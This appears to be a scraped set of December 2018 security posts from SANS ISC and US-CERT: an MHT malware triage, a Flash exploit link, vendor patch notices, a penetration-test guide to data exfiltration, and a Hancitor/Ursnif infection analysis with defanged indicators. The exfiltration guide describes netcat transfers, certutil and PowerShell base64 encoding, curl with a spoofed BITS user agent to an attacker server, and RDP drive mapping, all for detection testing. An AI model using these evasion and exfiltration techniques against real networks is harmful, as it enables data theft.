For MHT files, Xavier has already explained how they can be malicious in this diary entry.

I take a look at the ZIP file with my zipdump utility:

The extension .mht indicates that it is an MHT file. I use option -e to get more information on the content of the file (together with option -S , to use a comma as separator):

It’s a small file (201 bytes decompressed), and it contains ASCII text: 27 whitespace characters and 174 printable ASCII characters (no NULL bytes, no control characters and no non-ASCII bytes).

An ASCII dump (option -a) confirms it’s text:

And thus I can safely extract the content to my console:

As Xavier explained in his diary entry on MHT files, this MHT file, when opened, will download and open a JAR file (provided Java is installed).

Files that purport to be documents, but actually download and execute programs, are clearly malicious. I often see that very small files like this MHT file, have 0 detections on VirusTotal when they are submitted right at the beginning of the malware campaign. It’s only later, when AV definitions get updated, that the detection rate on VirusTotal increases.

When I performed the initial analysis, the JAR file was no longer available.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Is it Time to Update Flash? (If you haven’t already), (Thu, Dec 6th)

This post was originally published on this site

If you haven’t uninstalled Flash yet, maybe today should be that day.  The update posted yesterday has a remote code exec proof-of-concept already here:
https://github.com/smgorelik/Windows-RCE-exploits/blob/master/Documents/Office%2BFlash/CVE-2018-15982_%23PoC%23.zip

And Gigamon has posted that it’s being seen in the wild already:
https://atr-blog.gigamon.com/2018/12/05/adobe-flash-zero-day-exploited-in-the-wild/

 

===============
Rob VandenBrink
Compugen

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Adobe Releases Security Updates

This post was originally published on this site

Original release date: December 06, 2018

Adobe has released security updates to address vulnerabilities in Adobe Flash Player and Adobe Flash Player installer. An attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Adobe Security Bulletin APSB18-42 and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.

Data Exfiltration in Penetration Tests, (Tue, Nov 27th)

This post was originally published on this site

In many penetration tests, there’ll be a point where you need to exfiltrate some data.  Sometimes this is a situation of “OK, we got the crown jewels, let’s get the data off premise”.  Or sometimes in this phase of the test the goal is “let’s make some noise and see if they’re watching for data exfiltration – hmm, nothing yet, let’s make some LOUDER noise and see (and so on)”.  As with most things, there’s a spectrum of methods to move the target data out, with various levels of difficulty for detection.

At the basic end of the spectrum, moving the data in clear text is a good test at the “are they even monitoring” end of things.  “Living off the land” (using natve operating system tools) is usually the prefered approach in my gigs – so the obvious method is to try ftp – there’s an ftp client on pretty much every workstation and server OS on the planet.  If you are moving identified target data (credit card information, customer account information, other PII, engineering drawings, source code or other intellectual property), this should trigger some DLP (Data Loss Protection) detection at the perimeter – often this is coded into the firewall.

What else should see this?  Really outbound FTP shouldn’t work – your client should have an egress filter on their firewall – outbound clear text file transfers to random hosts shouldn’t be allowed.  But say they it’s allowed.  Firewall logs will definitely show the transfer, but if there’s no egress filter chances are nobody’s watching the logs of the “noisiest” piece of infrastructure in the fleet – firewall logs can easily top 5GB per day, even in a small-ish organization.

A simple “cat todayslog.txt | grep /21 | grep -i permit” will show your successful exfil in the logs.  If there’s an egress filter, you’d be looking for a blocked transfer, which would look more like:
cat todayslog.txt | grep /21 | grep -i deny

If the client has Netflow running for their perimeter, Netflow will show to/from traffic by protocol, so if they’re running netflow telemetry from the firewall to a collector, your client will have you on film, with pictures (again, if they are looking).

OK, say you need to ramp it up a notch?  If you’re able to transfer any tools in (or if you’ve popped a linux host), netcat (or ncat if you’ve got an nmap install you can use) is your friend – or you can use any number of PowerShell or Python implementions of netcat if you’d rather stick to running native tools.  This will allow you to exfiltrate data, still in clear text to a host ready to receive it – it just won’t look like FTP.

This will be tougher to see, because you’re exiting out on a different port.  You might think “let’s pick 1337, that’s a really cool “leet” port”, or some other random port.  But that will pop up as an outlier in any tool if they’re looking at traffic.  Not only will DLP see the data right away, but it’ll pop up as “odd” to any log monitoring tool or netflow collector.

Maybe source it from a random port and use 80 or 443 as a target port?  We still see lots of folks that say “tcp/443 is encrypted, we won’t even inspect it”.  Or better yet, if you are exfiling from a server with an inbound web service, using ncat or similar, with the ports reversed – source port of 443 and destination some random port – to an unsusecting eye or poorly configured tool, this will look like inbound traffic to a legitimate service.  Except maybe for the volume of data leaving that is…

Let’s scramble the data – – maybe they won’t detect these same cleartext methods, but let’s base64 the data first?  If you are operating from a customer *nix server that’s easy, but if you’re on a windows host, you can base64 encode data just using certutil (included on every windows host on the planet:
certutil -encode c:foodata.binortext c:fooscrambledata.asc
and
certutil -decode c:fooscrambleddata.asc unscrambleddata.txtorbin

Powershell is a nice tool for encoding and decoding also – first, let’s encode:

PS L:datareadytoexfil.source> $test = “this is some target data.  for larger files, use get-content instead of direct assignment”
PS L:datareadytoexfil.source> $test2 = [System.Convert]::ToBase64String([System.Text.Encoding]::UNICODE.GetBytes($test))
PS L:datareadytoexfil.source> $test2
dABoAGkAcwAgAGkAcwAgAHMAbwBtAGUAIAB0AGEAcgBnAGUAdAAgAGQAYQB0AGEALgAgACAAZgBvAHIAIABsAGEAcgBnAGUAcgAgAGYAaQBsAGUAcwAsACAAdQBzAGUAIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIABpAG4AcwB0AGUAYQBkACAAbwBmACAAZABpAHIAZQBjAHQAIABhAHMAcwBpAGcAbgBtAGUAbgB0AA==

Now, after you’ve moved the data, you’ll need to decode that data:

PS C:exfil.destination> $test3 = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($test2))
PS C:exfil.destination> $test3
this is some target data.  for larger files, use get-content instead of direct assignment

(Thanks Jeffrey Snover and his 2006 blog post on this!   https://blogs.msdn.microsoft.com/powershell/2006/04/25/base64-encodedecode-a-string/  )

OK, lets say that your client is equipped to see all of this so far (base64 encoding really should be triggering alarms) –  how would you kick it up a level and exfil data using real encryption?  

An SSH Tunnel or a straight up SCP file transfer is a favourite for this.  Hopefully the client has a simple rule on their firewall though that only allows this from specific hosts or specific user accounts.  This would mean that your transfer will either be a block/alert thing for them, or worst case a permit/alert thing.

If they permit it, you can try just uploading yoru data to a public HTTPS repo.  Mostly a well configured firewall should catch this though – for instance:

  • dropbox, onedrive and the like – traditional clients should normally have a “we store our data here” policy – so this sort of site really should be blocked unless your compromised account is in a group with access to one or more of these general purpose “stash your files here” sites.  Of course if your client has a “the cloud is sparkly and can do no wrong” outlook, this is the perfect way to exfiltrate your data.
  • Similarly, github should be restricted for most users – however, if you can compromise a developer account it makes a dandy target and will usually work.

What if you’re trying to trigger an alert?  OK, try sending your exfil via https to pastebin – – there shouldn’t be a legitimate need to access pastebin for most folks.  Hopefully any well configured firewall will block and alert on this one!

What’s the next most difficult method to see?  OK, we’ll go back to cleartext for this one, but most folks won’t be looking at their own remote access VPN for data exfiltration.  If they use a single factor authentication (userid and password, usually back-ended with active directory), then this a great method of moving lots of data.  Because why would they block that, in most cases management is in favour of people working after hours from home!  That is until you ask what happens if that salesperson who left last week managed to exfil your entire client list, current pricing matrix and maybe all the RFPs that are currently in flight?  (this exfil method is a great way to make this point)

Let’s say you want to use an encrypted data transfer direct to your $evilserver?  OK, curl will do that, but it’ll look like curl.  Changing the useragent will help, but changing it to match firefox or chrome won’t change the $evilserver destination.  hmmm – what service is usually whitelisted right near the top of the firewall list?   Yup, you guessed it, let’s make our traffic look like Windows Update -let’s change the user agent to look like a Microsoft BITS (Background Intelligent Transfer Service) file transfer.  Change the curl useragent to “Microsoft BITS/7.5” and very likely you won’t have any trouble at all getting your data out.  Often you don’t even need to encrypt it, send it out in clear text on port 443 with that useragent, and you’ll sail past everyone’s “Next Generation” firewall, IPS or whatever.

You can move data using BITSADMIN (in most Windows versions), or if you are in a newer windows version, just use the BITS commands in Powershell.

Other methods?  If there’s an inbound RDP service (either native or an RDS gateway), RDP in, and map a drive back to your client with “net use v: tsclientsharename”.  Now you can use xcopy, robocopy or whatever to move data in or out, and it’ll all be encrypted using a legitimate protocol that the client expects to see, and very (very) likely is not decrypting.  Their only hope of detection will be the target address.  If their RDS gateway allows full access from the internet, then they’re out of luck.  You’d also be surprised how many organizations allow *outbound* RDP (no matter how bad that idea is) to any target host.  If that’s the case, you can RDP back to your $evilserver from any internal customer host, map a drive back to the client host and move data using this exact same method!

One thing to note – we discussed these things more or less in order of difficulty, this isn’t normally the order you try things in.  Most often, I’ll start with the toughest ones to detect, then work my way down successively to the easier ones until I’m “caught”.  In most cases, you *want* to be caught at some point, so that you can have the conversation about what was seen and was not seen.  If you get all the way down to a plain old FTP of cleartext data and are still undetected, it’s time for a serious conversation about perimeter configs, logging and alerting 🙂

A common thread to all of this is that if your client has a “next gen” firewall, they are not safe.  If you’ve compromised AD, usually you can create a dummy user and put that user in a group that has permissions to exfiltrate the data, so that the firewall just lets it sail on through.  Change logging in AD should alert your client to this sort of activity. Or if you’re able to leverage your AD access to then login to the firewall as an admin, you’ll be able to (with permission of course), permit your exfiltrated data to pass outbound with no logging or alerting, then delete that rule.  Change logging on your firewall should catch this immediately.  If you aren’t logging admin activities on the firewall, or at least backing up your firewalls and running “diff” against yesterday’s backups, then you need to be doing that (this really is a recommendation we were making 10-15-20 years ago).

What did I miss?  Sure, you can do exactly this job with metasploit, unicorn or any number of other tools, but if possible I try to stick with what I can use on the host OS – the things that the client expects to see either from regular users or regular system administrators.   Using native tools to accomplish malicious goals will usually make a bigger impact in your report.

Even with that “living off the land’ approach, I’m sure that I’ve missed other methods of data exfiltration – what native methods have you used to exfiltrate data?  What methods worked, what methods got caught and how?  Use our comment form to fill us in!

===============
Rob VandenBrink
Compugen

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Releases Multiple Security Updates

This post was originally published on this site

Original release date: December 05, 2018

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:


This product is provided subject to this Notification and this Privacy & Use policy.

Campaign evolution: Hancitor changes its Word macros, (Wed, Dec 5th)

This post was originally published on this site

Introduction

Today’s diary reviews trends in recent malicious spam (malspam) pushing Hancitor.

Background:  Malspam pushing Hancitor (also known as Chanitor or Tordal) is a long-running campaign.  In recent months, we’ve often seen waves of Hancitor malspam 2 or 3 times each week.  Infections from this malspam tend to follow predictable patterns, and have ended with Ursnif as the follow-up malware since the end of October 2018 (previously it had been Zeus Panda Banker).

Recent activity:  After a wave of malspam on 2018-10-29, this campaign went silent, and we saw no new Hancitor malspam for one month.  Last week on Thursday 2018-11-29, Hancitor malspam returned with changes to the macro code in the associated Word documents.  Hancitor is still sending Ursnif as its follow-up malware.

Today’s diary reviews an infection from Hancitor malspam seen on Tuesday 2018-12-04.


Shown above:  Flow chart for the Hancitor infection on Tuesday 2018-12-04.

The malspam


Shown above:  Screen shot from an email in this malspam wave.

The email template for Tuesday’s malspam was eFax-themed, which is something we’ve occasionally see from this campaign.  No big surprises here.  And the link to download a Word document follows the same pattern of ASCII characters at the end, where all characters after the = sign are an encoded string that represents the recipient’s email address.  I’m still not sure how to decode these strings.

Below is an example of the email headers from one of the messages on Tuesday:

Received: from lenoxia.com ([169.203.179.39]) by [removed] for [removed];
        Tue, 04 Dec 2018 15:38:56 +0000 (UTC)
Date: Tue, 04 Dec 2018 08:40:58 -0700
MIME-Version: 1.0
X-Mailer: iPad Mail (11D169b)
Content-Transfer-Encoding: 7bit
Subject: This is an automatic eFax Notification
Message-ID: <1563DCE3.5F979EAC@lenoxia.com>
From: "eFax, Inc." <efax@lenoxia.com>
Content-Type: text/html;
    charset="utf-8"
TO: [removed]
Reply-To: "eFax" <efax@lenoxia.com>

 

At first glance, the downloaded Word document looks similar to those seen in previous waves of Hancitor malspam.  Victims must enable macros to infect a vulnerable Windows host.  However, the macros act noticeably different than before (more on that later).


Shown above:  Downloading a Word document from a link in the malspam.

Infection traffic

Infection traffic follows the same patterns we’ve previously seen for Hancitor, except wotj additional infection traffic for Ursnif instead of Zeus Panda Banker.  In this case, I also saw Tor traffic, which might be related to the Ursnif activity.  An HTTP request to amalu[.]at returned an encoded binary about 2.2 MB in size, which matched a malware binary I found on the infected Windows host for Send Safe Enterprise (SSE) spambot malware.  I also saw the UDP beaconing traffic associated with SSE spambot malware.


Shown above:  The initial infection traffic filtered in Wireshark, showing Hancitor and Ursnif traffic.


Shown above:  Later in the infection, we find Tor traffic.


Shown above:  Infected host retrieves SSE spambot executable (encoded when sent over the network).


Shown above:  UDP beaconing traffic caused by SSE spambot malware.

Forensics on the infected host

Unlike previous Hancitor Word docs, ever since Hancitor reappeared on 2018-11-29, the Word documents are noticeably larger, and they contain ASCII-based hex code that is decoded as two executable files dropped after enabling macros.  These two executables are named werd.exe and wird.exe, and they’re dropped to the user’s AppDataRoaming directory.  A folder also appeared in the AppDataRoaming directory with links copied from the desktop of my infected Windows host.  I also saw folders named msohtmlclip and msohtmlclip1 that were created in the user’s AppDataLocalTemp directory.

Ursnif was made persistent through about 14MB of ASCII code stored as Windows registry entries.  This is normal for Ursnif infections, and I’ve exported a copy of these registry entries so people can review them.  See the link at the end of this dairy to access the data.

Finally, SSE spambot malware was stored in the user’s AppDataLocalTemp directory using random digits in the filename.


Shown above:  werd.exe and word.exe dropped to the user’s AppDataLocalTemp directory.


Shown above:  More artifacts from the infected Windows host.


Shown above:  Windows registry entries created by Ursnif on the infected Windows host.

Indicators

The following are indicators from an infected Windows host.  Any malicious URLs, IP addresses, and domain names have been “de-fanged” to avoid any issues when viewing today’s diary.

URL from the malspam text to download the initial Word document:

  • 47.89.18[.]253 port 80 – your365realestateoffice[.]com – GET /?[string of characters]=[string of characters representing recipient’s email address]

Hancitor infection traffic after enabling Word macros:

  • port 80 – api.ipify.org – GET /  (IP address check by the infected host, not inherently malicious)
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /4/forum.php
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /mlu/forum.php
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /d2/about.php
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/1
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/2
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/3

Ursnif infection traffic:

  • 47.52.45[.]178 port 80 – api2.doter[.]at – GET /webstore/[long string]
  • 47.52.45[.]178 port 80 – 47.52.45[.]178 – GET /favicon.ico
  • 47.52.45[.]178 port 80 – beetfeetlife[.]bit – GET /webstore/[long string]
  • 47.52.45[.]178 port 80 – beetfeetlife[.]bit – GET /jvassets/o1/s64.dat

Tor traffic seen after the initial Hancitor and Ursnif activity:

  • various IP addresses over mostly port 80 – GET /tor/status-vote/current/consensus
  • various IP addresses over mostly port 80 – GET /tor/server/fp/[long hex string]
  • various IP addresses over port 443 – SSL/TLS traffic

Infected host retrieves SSE spambot malware:

  • 46.163.119[.]217 port 80 – amalu[.]at – GET /wp-admin/includes/36s

UDP beacon caused by SSE spambot malware:

  • 31.44.184[.]36 port 50012

Malware from an infected Windows host:

SHA256 hash:  eebc056d535f2b1278df043eee776595b6526e47a6cffdc67641c165b1f5e973

  • File size:  458,240 bytes
  • File description:  Word doc downloaded form email link, doc has macro for Hancitor
  • File name:  invoice_530486.doc   (random digits in the file name)

SHA256 hash:  ad783ca9c2bd4c9905b131d170c1dce5bad9de8b8c2d4607a8cd051021284df0

  • File size:  114,690 bytes
  • File description:  Hancitor malware binary dropped by Word macro
  • File location:  C:Users[username]AppDataRoamingwerd.exe

SHA256 hash:  a1a0cb7e5a7239b7aa69f2d052464c201bd5082d9a8b2aac6997fda5de9a7228

  • File size:  52,226 bytes
  • File description:  Hancitor-related executable dropped by Word macro
  • File location:  C:Users[username]AppDataRoamingwird.exe

SHA256 hash:  9350609c8c806a9c1a667fd53926ea85745e1da239df7f3c2aad3e3527bd48d1

  • File size:  249,544 bytes
  • File description:  Ursnif executable retrieved by Hancitor-infected host
  • File location:  C:Users[username]AppDataLocalTempBNA4D6.tmp   (random characters in the file name)

SHA256 hash:  86ca2f22dd4c99b57bb9d272cd5dd91978e15853efa0c05ede8c80694a8d27a6

  • File size:  2,163,976 bytes
  • File description:  Send Safe Enterprise (SSE) spambot malware
  • File location:  C:Users[username]AppDataLocalTemp1907751.exe   (random digits in the file name)

Final words

3 email examples, a pcap of the infection traffic, and malware/artifacts associated with today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Google Releases Security Updates for Chrome

This post was originally published on this site

Original release date: December 04, 2018

Google has released Chrome version 71.0.3578.80 for Windows, Mac, and Linux. This version addresses multiple vulnerabilities that an attacker could exploit to take control of an affected system.

NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.